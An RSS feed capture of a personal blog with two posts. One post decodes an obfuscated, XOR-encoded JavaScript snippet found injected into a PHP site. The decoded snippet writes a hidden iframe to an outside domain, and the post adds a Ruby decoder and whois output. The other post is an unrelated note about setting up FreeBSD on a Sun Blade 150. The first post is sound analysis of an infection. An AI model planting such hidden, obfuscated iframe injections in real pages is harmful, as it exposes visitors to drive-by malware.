:wq - blog » php http://writequit.org/blog Tu fui, ego eris Mon, 22 Dec 2014 14:54:59 +0000 en-US hourly 1 http://wordpress.org/?v=4.1.5 Obfuscated javascript fun http://writequit.org/blog/2008/03/05/obfuscated-javascript-fun/ http://writequit.org/blog/2008/03/05/obfuscated-javascript-fun/#comments Wed, 05 Mar 2008 19:25:07 +0000 http://writequit.org/blog/?p=14 A friend of mine (thanks Legit) turned me on to this piece of javascript found in the midst of some PHP:

<script language="JavaScript">
var0 = "x69x3cx33x27x34x38x30x75x3bx34"; var1 = "x38x30x68x72x36x3ax20x3bx21x30"; var2 = "x27x72x75x26x27x36x68x72x3dx21"; var3 = "x21x25x6fx7ax7ax33x27x34x38x30"; var4 = "x26x21x34x21x7bx3bx30x21x7ax3c"; var5 = "x3bx31x30x2dx67x7bx25x3dx25x72"; var6 = "x75x3dx30x3cx32x3dx21x68x72x64"; var7 = "x63x72x75x22x3cx31x21x3dx68x72"; var8 = "x64x63x72x75x33x27x34x38x30x37"; var9 = "x3ax27x31x30x27x68x72x65x72x75"; var10 = "x26x36x27x3ax39x39x3cx3bx32x68"; var11 = "x72x3bx3ax72x6bx69x7ax3cx33x27"; var12 = "x34x38x30x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>

The “getElementById” that testws35fdgh refers to is this empty div:

<div id="testws35fdgh"></div>

As it turns out, this is some really terrible obfuscation, here’s the simple script to decode it (written in Ruby because I like Ruby):

#!/usr/bin/env ruby
hex = ["x69","x3c","x33","x27","x34","x38",
"x30","x75","x3b","x34","x38","x30","x68",
"x72","x36","x3a","x20","x3b","x21","x30",
"x27","x72","x75","x26","x27","x36","x68",
"x72","x3d","x21","x21","x25","x6f","x7a",
"x7a","x33","x27","x34","x38","x30","x26",
"x21","x34","x21","x7b","x3b","x30","x21",
"x7a","x3c","x3b","x31","x30","x2d","x67",
"x7b","x25","x3d","x25","x72","x75","x3d",
"x30","x3c","x32","x3d","x21","x68","x72",
"x64","x63","x72","x75","x22","x3c","x31",
"x21","x3d","x68","x72","x64","x63","x72",
"x75","x33","x27","x34","x38","x30","x37",
"x3a","x27","x31","x30","x27","x68","x72",
"x65","x72","x75","x26","x36","x27","x3a",
"x39","x39","x3c","x3b","x32","x68","x72",
"x3b","x3a","x72","x6b","x69","x7a","x3c",
"x33","x27","x34","x38","x30","x6b"]
line = ""
hex.each { |c|
## Unpack the char
c = c.unpack('c').to_s.to_i
## XOR with 85
d = c ^ 85
## Pack back into a character
t = [d].pack('c')
## Append to the line
line = line + t
}
puts line

Which eventually leads you to:

<iframe name='counter' src='http://framestat.net/index2.php' height='16' width='16' frameborder='0' scrolling='no'></iframe>

If you do a whois on the framestat.net domain, you can see that the domain was suspended:

Registrant:
Suspended Domain ****@4host.info +1.00000000
Suspended domain
Suspended domain
Suspended domain,
Suspended domain,US 94040

Registration Service Provider:
name: Rustelekom Ltd.
tel: +1.8666254678
fax: +1.9782465632
web:http://nameservers.ru

Looks like someone’s been up to something naughty ;) It also looks like it was originally a Russian site (not that it matters). Since the site is down, it’s difficult to tell what would have happened if the iframe source still existed. I’m guessing malware.

Still, the question remains, how did the javascript get to the page? I’m still looking in to that, right now my theory is php remote-file-inclusion, but we’ll see as things become a bit more clear.

]]>
http://writequit.org/blog/2008/03/05/obfuscated-javascript-fun/feed/ 1
An update on the Sun Blade 150 http://writequit.org/blog/2007/10/15/an-update-on-the-sun-blade-150/ http://writequit.org/blog/2007/10/15/an-update-on-the-sun-blade-150/#comments Mon, 15 Oct 2007 20:42:48 +0000 http://writequit.org/blog/?p=77 Well, I finally got around to finishing doing all the installs and setup on the Blade 150 I had laying around. In the end, since it only had 1gb of RAM and only 1 600 Mhz UltraSPARC II processor, I decided to go with FreeBSD instead of Solaris.

Initially, Solaris worked great serving up a webpage, however, the fact that I did a whole install and the fact that solaris is not exactly speedy on older hardware made working with it a little painful. If unattended, the next time I accessed the machine it would take a few seconds to spin up before allowing a login or serving a webpage. The fact that I left mostly all of the daemons running didn’t help. Yea, I know I could have disabled them all, I just like started clean rather than having to clean up.

Enter FreeBSD. I decided to stay away from Linux also, short of a Gentoo install (which would be painfully slow to compile everything), it’s an extremely easy way to get a minimal install with the smallest amount of effort. That and I enjoy using different things, time to brush up on the BSD knowledge since it’s been a couple of years since I’ve used it. Anyhow, now the machine is running FreeBSD 6.2-RELEASE with a pretty vanilla install. I set up Lighttpd, MySQL, PHP for a web service so I can teach Delilah PHP one of these days. I also set up ajaxterm so I can access a command-line from places where SSH is blocked completely *cough*work*cough* in the event of an emergency.

Overall, I’m liking it more than Solaris, it’s certainly a lot more snappy and much easier to get all the things I want using ports than trying to mess with doing a build from source on Solaris.

You can check out my extremely weaksauce main page here:

http://navi.eight7.org

Anyone have any suggestions for what else I should use it for? Let me know in the comments!

]]>
http://writequit.org/blog/2007/10/15/an-update-on-the-sun-blade-150/feed/ 1